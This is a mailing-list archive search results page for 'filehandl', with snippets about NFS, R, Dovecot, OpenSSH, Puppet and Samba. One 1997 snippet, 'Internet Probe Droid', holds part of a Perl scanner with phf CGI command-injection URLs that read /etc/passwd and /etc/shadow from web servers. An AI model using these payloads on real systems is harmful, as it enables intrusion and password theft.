search for: filehandl

Displaying 20 results from an estimated 123 matches for "filehandl".

Did you mean: filehandle
2010 Jun 17
4
[PATCH] Improve support for exporting btrfs subvolumes.
...out knowing internal details of the filesystem in question, so we need to encode specific knowledge of btrfs in mountd. This is unfortunate. To ensure smooth handling of this and possible future changes in uuid generation, we add infrastructure for multiple different uuids to be recognised on old filehandles, but only the preferred on is used on new filehandles. Signed-off-by: NeilBrown <neilb-l3A5Bk7waGM@public.gmane.org> -- This is a substantially revised version of a patch I posted a while ago. I tried to find a way to do it would hard coding knowledge of btrfs in nfs-utils, but it isn'...
2007 Aug 15
1
Error in building R
...and it works fine. Then, when I invoke make, I get this kind of error messages: make[2]: Entering directory `/usr/local/R/R-2.5.1-inst/src/library' >>> Building/Updating help pages for package 'base' Formats: text html latex example Can't use an undefined value as filehandle reference at /usr/local/R/R-2.5.1-inst/share/perl/R/Rdconv.pm line 78. >>> Building/Updating help pages for package 'tools' Formats: text html latex example Can't use an undefined value as filehandle reference at /usr/local/R/R-2.5.1-inst/share/perl/R/Rdconv.pm line 78....
2012 May 07
1
Authentication process holding open filehandles
Hi, We're using dovecot to provide pop3 for a number of mailboxes. The setup is pretty simple: Each user / domain has a mailstore in /data/mailstore/<domain>/<user>/Maildir (backed by NFS). Passwords are in simple passwd-file format in the top level domain directory eg: # cat /data/mailstore/foo.com/.passwd user:{plain}password The passdb setup looks like this. passdb {
2006 Dec 22
1
Correct usage of NFS mounted Maildirs
...cal/dovecot/indexes/%u (only one dovecot server and wanted to see if local indices helped) I didn't turn off the attribute caching of NFS since I only have one dovecot server, I think the wiki said it was safe to leave on in this case. With this configuration, I am seeing a lot of NFS Stale Filehandle errors, even after moving the index files to a local disk. Here's an excerpt from the log: dovecot: Dec 22 11:23:06 Info: Dovecot v1.0.rc15 starting up dovecot: Dec 22 11:23:22 Info: imap-login: Login: user=<nfsuser1>, method=plain, rip=138.26.64.50, lip=138.26.64.5 dovecot: Dec 22 11:...
2007 Dec 08
6
[Bug 1398] New: slave ssh sessions enter a never-ending blocking state
...vely at fanniemae.com Created an attachment (id=1388) --> (http://bugzilla.mindrot.org/attachment.cgi?id=1388) Patch to close client_fd I've currently looking at increasing the MAX_SESSIONS to increase the number of slave ssh processes to be multiplex where I ran into the default maximum filehandle limit on a test machine (Solaris 8). I've found a similiar set of patches in the cvs repos that is similiar to a dirty patch that I came up with; so I've been implementing the patch in the repos. The patch includes clientloop.c at 1.182, monitor_fdpass.h at 1.4 and monitor_fdpass.c at 1.1...
1997 Sep 28
0
[IPD] Internet Probe Droid
...------------------------------------------------------------------- #!/usr/bin/perl # Scans web servers for bad phf executables # Constants. $max = 25; # how many simultaneous shells to run $debug = 1; $path = "pwds"; $shadowpath = "$path/shadowed"; $fh = "fh000"; # filehandle variable $queries = ''/cgi-bin/phf?Qalias=x%0acat%20/etc/passwd%0aecho%20ImPrDr%0aid%0aecho%20ImPrDr%0auname%20-a''; $getShadow = ''/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/shadow''; ### ## # Begin main &banner(); # just to be anal @really_dumb_sites = (); $...
2007 Nov 23
3
CopyHandler and hidden files?
Hello, I was wondering whether the CopyHandler plugin works with hidden files like .htaccess? I have an .htaccess under src/ and another one under src/code/, but they won''t be copied to output/. My config.yaml is: File/CopyHandler: paths: [''**/*.css'', ''**/*.js'', ''**/*.jpg'', ''**/*.png'',
2006 Sep 02
15
service restart failures
Puppet is failing to restart lighttpd using the Debian init script. Both the default action of stop/start and using the reload action, which basically does the same thing, fail. It seems to be a filehandle problem. Changing the execute method in service.rb to redirect stdout to /dev/null allows the daemon to restart. Otherwise, I end up with a zombie process and according to strace, ruby keeps doing this: read(7, 0xa7bf1000, 4096) = ? ERESTARTSYS (To be restarted) --- SIGVTALRM (Vir...
2010 Jun 02
2
NFS exporting btrfs subvolumes.
NFS needs a unique identifier for a filesystem to be able to export it. This can be set by the admin (fsid= in /etc/exports) but that is a hassle and it is best to set it automatically. nfs-utils currently uses the UUID returned by libblkid if that works, or the fsid returned by statfs64 if libblkid finds nothings and fsid is non-zero. Otherwise it uses device major/minor. This
1999 Sep 17
2
Non-interactive sessions
...dn't work and I got the following error message: " Fatal error : you must specify '--save', '--no-save', or '--vanilla' " What is the '--vanilla' option all about? Regards, Neil Appendix: My Perl Code ------------------------------------------ use FileHandle; $R = new FileHandle ("| R --no-save"); $R->print("postscript(\"myfile.ps\")\n"); $R->print("dev.print(postscript)\n"); $R->print("curve(sin(x),-pi,pi)\n"); $R->print("dev.off()\n"); -------------------------------------------...
2020 May 28
5
xinetd custom service - perl - remote address
Hi all, I can't believe that I can't find the answer to this one. I have a perl script which is called by xinetd. I want that perl script to be able to detect the remote IP address of the caller. I presumed that it would be an environment variable but I could be wrong. I've found reference to the ENV and PASSENV arguments for xinetd.conf but no examples, and no indication of what
2015 Apr 15
2
Modifying files of NFS
Hi, I have an NFS storage system and want to run jpegoptim on several GB's of jpeg images and I'm wondering what the best approach is. Is it ok to run this operation on the Server itself while the clients have it mounted or will this lead to problems like e.g. the dreaded "stale filehandle"? Regards, Dennis
2001 Oct 27
2
one log for each module
There are some way to have a log for each module? If there aren't, it should be a a great functionality for maintaining the server. Thanks for the help and continue with this great application !
2007 Mar 16
4
Install of Tomcat5.5 package on Debian hangs
I''m trying to install the tomcat5.5 package under Debian Etch. The problem is that the init.d script for tomcat5.5 uses "su .... &" to run some things (I think logging processes?) This causes puppetd to hang in its run, because the subprocess never returns (due to open filehandles?). Does anybody have any idea what I can do to get around this? The same "hanging" occurs if you manually run the init script from an ssh session, and then log out. Ssh doesn''t die, and you have ~. to get out. Thanks, Jordan
2006 Jun 19
2
win32-service cvs - potential issue with Service.services
.../tc_service.rb:227:in `services'' test/tc_service.rb:227:in `test_services'' 45 tests, 145 assertions, 0 failures, 1 errors If I run this test by itself via -n test_services, it always passes. Is this just an issue with interaction with Test::Unit itself? Or am I leaving a filehandle open somewhere that I''ve missed? I''m not going to sweat it too much, but I thought I would ask for another pair of eyes. Regards, Dan
2007 Jul 26
2
Rd2dvi (PR#9812)
Is this a bug-- ------------------------------------------------------------------------------- <234>% R CMD Rd2dvi base.Rd Converting Rd files to LaTeX ... base.Rd Can't use an undefined value as filehandle reference at /opt/R-2.5.1/lib/R/share/perl/R/Rdconv.pm line 78. ENCS is Creating dvi output from LaTeX ... Saving output to 'base.dvi' ... cp: cannot access .Rd2dvi26632/Rd2.dvi Done xdvi-xaw.bin: Fatal error: base.dvi: No such file. <235>% ls base.Rd base.Rd <236>% uname -a...
2012 Oct 18
1
GlusterFS failover with UCarp
Hi, we've successfully configured GlusterFS mirroring across two identical nodes [1]. We're running the file share under a Virtual IP address using UCarp. We have different clients connected using NFS, CIFS and GlusterFS. When we simulate a node failure, by unplugging it, it takes about 5 seconds for the CIFS and GlusterFS clients to refresh the connection and continue operation. The
2010 Mar 16
3
I stream read - stale NFS file handle (reboot of server)
In the old days NFS Shared Path had a static handle (ie a number), normal based on some number pulled out of the file system/inode. To fix (well work around) a security issue, for about 10+ years now, when a NFS server reboots, it generates a new random handle for the NFS Share. (sever may generate a new random handle per mount request) The NFS Stale Handle happens when the client is still
2016 Mar 12
2
static vs shared modules build
Since all my Samba AD member servers rely on vfs_acl_xattr to take care of Windows permissions, is there any performance advantage to building samba with a static vfs_acl_xattr module? (./configure --with-static-modules=vfs_acl_xattr) Thank you
2016 Mar 12
2
static vs shared modules build
> no, it only has a theoretical impact on the number of open > filehandles, theroretical means in that context surely not relevant > for a fileserver > > if you have a preforking service and expect many thousand forkers than > it may become relevant Thank you Would you give the same advice in the case of a Samba 4 AD Domain Controller?